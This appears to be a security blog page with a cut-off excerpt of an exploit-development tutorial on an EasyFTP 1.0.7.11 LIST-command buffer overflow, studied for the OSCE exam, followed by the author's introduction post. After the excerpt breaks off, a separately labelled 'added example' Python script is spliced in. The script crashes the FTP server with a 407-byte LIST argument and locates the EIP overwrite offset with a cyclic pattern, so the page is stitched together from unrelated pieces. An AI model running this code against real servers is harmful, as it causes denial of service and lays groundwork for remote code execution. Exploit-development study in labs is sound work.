Posts

EasyFTP 1.0.7.11 Exploiting FTP with an EggHunter, Limited Space and Custom Shell Code

While studying for Offensive Security's OSCE exam I began exploring exploit-db.com for vulnerable applications whose exploits I could try to recreate. I found EasyFTP 1.0.7.11 and set about trying to own it.


1. Fuzzed with boofuzz, which identified the LIST command as the input that crashes the server (a crash, not yet a confirmed exploitable condition).


- I found a good boofuzz tutorial on YouTube.

- Note below that I reviewed several different commands, including USER, STOR, RETR, PASS and LIST. Generally speaking you identify these commands by reading the RFC for the protocol (RFC 959 for FTP) and by reviewing a Wireshark capture taken while interacting normally with the application.

(part of Boofuzz python script)



(output of running BooFuzz python script)

- You can see that at 407 bytes the script stops receiving a response from EasyFTP, i.e. it crashed. At this point you want to confirm the crash in Immunity Debugger (attached to the EasyFTP process) and note what ended up in the registers, EIP in particular.
2. Replicated the boofuzz result with a Python script
- link to source can b…
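The replication script that step 2 describes, written here as an added example rather than the author's own code: it logs in, sends a LIST whose argument is the 407-byte length the boofuzz run reported, and carries a cyclic-pattern helper for locating the EIP offset once the crash is confirmed in the debugger (a standard follow-on step, not one shown on this page). The host, port, anonymous credentials and the need to log in before LIST are assumptions, not facts from the post.

```python
"""Replicate the boofuzz LIST crash against EasyFTP 1.0.7.11 with a plain
socket script, then locate the EIP offset with a cyclic pattern.

Added example, not the author's script.  Assumptions (not from the post):
the server listens on 127.0.0.1:21, accepts an anonymous login before
LIST, and the crash reproduces at the 407-byte length boofuzz reported.
"""
import socket
import string
import struct
import sys

HOST = "127.0.0.1"   # assumed lab VM running EasyFTP
PORT = 21
USER = b"anonymous"  # assumed credentials; adjust to the target's config
PASS = b"anonymous"
CRASH_LEN = 407      # length at which the boofuzz run stopped getting replies


def build_list(arg: bytes) -> bytes:
    """LIST command with a fuzzed argument, CRLF-terminated per RFC 959."""
    return b"LIST " + arg + b"\r\n"


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique,
    so the bytes that land in EIP map back to one offset."""
    chars = (u + l + d
             for u in string.ascii_uppercase
             for l in string.ascii_lowercase
             for d in string.digits)
    return "".join(chars).encode()[:length]


def eip_to_bytes(eip: int) -> bytes:
    """Little-endian bytes of the EIP value Immunity shows after the crash."""
    return struct.pack("<I", eip)


def find_offset(pattern: bytes, eip_bytes: bytes) -> int:
    """Index of the 4 pattern bytes that landed in EIP, or -1 if not found."""
    return pattern.find(eip_bytes)


def ftp_session(host: str, port: int, user: bytes, password: bytes,
                timeout: float = 5.0) -> socket.socket:
    """Connect and complete the USER/PASS exchange (replies are not validated,
    mirroring what a quick crash-replication script does)."""
    s = socket.create_connection((host, port), timeout=timeout)
    s.recv(1024)                                  # 220 banner
    s.sendall(b"USER " + user + b"\r\n")
    s.recv(1024)                                  # 331 expected
    s.sendall(b"PASS " + password + b"\r\n")
    s.recv(1024)                                  # 230 expected
    return s


def send_list(host: str, port: int, arg: bytes) -> bool:
    """Send one LIST; True if the server still answers, False if it died."""
    try:
        s = ftp_session(host, port, USER, PASS)
        s.sendall(build_list(arg))
        reply = s.recv(1024)                      # empty/timeout => crashed
        s.close()
        return len(reply) > 0
    except (socket.timeout, OSError):
        return False


def main(argv: list) -> None:
    mode = argv[1] if len(argv) > 1 else "crash"
    if mode == "crash":
        alive = send_list(HOST, PORT, b"A" * CRASH_LEN)
        print("server still responding" if alive
              else "no reply: confirm the crash in Immunity Debugger")
    elif mode == "pattern":
        # restart EasyFTP first; the previous run left it crashed
        send_list(HOST, PORT, cyclic_pattern(CRASH_LEN))
        print("pattern sent; read EIP in the debugger, then run: offset <hex>")
    elif mode == "offset" and len(argv) > 2:
        off = find_offset(cyclic_pattern(CRASH_LEN),
                          eip_to_bytes(int(argv[2], 16)))
        print(f"EIP offset: {off}" if off >= 0 else "EIP not found in pattern")
    else:
        sys.exit(f"usage: {argv[0]} [crash|pattern|offset <eip-hex>]")


if __name__ == "__main__":
    main(sys.argv)
```

Run it once in `crash` mode to reproduce the boofuzz result, restart the service, run `pattern` mode, and feed the EIP value from Immunity to `offset` mode; the returned index is where the overwrite begins in the LIST argument.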

Introduction....hell has frozen over and I've finally started a security blog

So.....hell has frozen over and I've finally started a security blog. My name is Aaron, aka T0b0rX0r, and Robot Security is my home away from 127.0.0.1. This blog was set up to host my tutorials, exploits, CTF walkthroughs and generally my thoughts on security. I am a technology professional based in the Los Angeles region. I've worked in information technology for 17 years and lately have been focusing on infosec. My background includes a bachelor's in Computer Science from USC, a master's in technology, and certifications as an Offensive Security Certified Professional (OSCP), a Certified Information Systems Security Professional (CISSP), and a Cisco Certified Network Professional (CCNP).

I'll be working to keep this site up to date with a new article once a week (at least). I can be reached on Twitter (@t0b0rx0r) and on LinkedIn. I also host my code (generally exploits) on GitHub (http://www.github.com/t0b0rx0r).